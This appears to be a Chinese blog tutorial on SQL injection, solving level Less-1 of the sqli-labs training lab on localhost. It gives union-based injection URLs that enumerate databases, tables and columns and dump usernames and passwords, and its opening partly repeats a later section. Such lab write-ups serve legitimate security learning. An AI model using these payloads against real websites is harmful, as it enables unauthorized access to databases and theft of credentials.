sql注入及sqli-labs-master/Less-1题解析
2019-07-20 15:39
615 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43948394/article/details/96596897
查询这个数据库里有那些表:
选择一个emails表查询他的结构:
下面可以看一个sqli-labs-master/Less-1题
题目要求:请输入带有数字值的id作为参数
基本字段:
schema_name,表示数据库名称;
table_name,表示表的名称 ;
column_name,表示字段名 ;
可以先尝试:
sql注入
group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。
mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。
database()——数据库名。
可以选择一个数据库名来进行查询
如:security
查询语句:
use security;
查询这个数据库里有那些表:
show tables;
选择一个emails表查询他的结构:
desc emails;
下面可以看一个sqli-labs-master/Less-1题
题目要求:请输入带有数字值的id作为参数
基本字段:
schema_name,表示数据库名称;
table_name,表示表的名称 ;
column_name,表示字段名 ;
可以先尝试:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1
返回正常的显示数据
http://127.0.0.1/sqllib/Less-5/?id=1'
可知,“ ’ ”并没有被过滤,
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'%23
回显正常
此时用order by判断列数,从1开始试,发现到4的时候报错
所以有三列,之后联合注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3%23
爆数据库名:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,database() %23
爆security数据库中的表:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select1,group_concat(table_name),3 from information_schema.tables where table_schema='security' %23
爆users中的列:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27%20%23
爆数据
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=2%20%23
id可以任意查询从1开始,最多有14列,
相关文章推荐
- sqli-labs-master第一关sql注入
- 通过sqli-labs学习sql注入——基础挑战之less11-22
- 通过sqli-labs学习sql注入——基础挑战之less1
- 通过sqli-labs学习sql注入——基础挑战之less1-10
- 通过sqli-labs学习sql注入——进阶挑战之less23-28a
- sqlilabs 下的less7
- sqli-labs Less 5盲注准备
- Sqli-labs less 45
- Sqli-labs less 33
- Sqli-labs less 16
- SQL注入之盲注sqli-labs-master
- SQL注入之手工注入sqli-labs-master
- Sqlilabs Less 38-45 Stacked Injection
- sqli-labs-master第五关Less-5 Double Query- Single:方式一
- SQL注入学习 -- sqli-labs lesson 1
- Sqli-labs less 44
- Sqli-labs less 25a
- Sqli-labs less 13
- Sqli-labs学习SQL注入-Lesson 1-10总结
- Sqlilabs Less 17 Post - Update Query - Error Based - String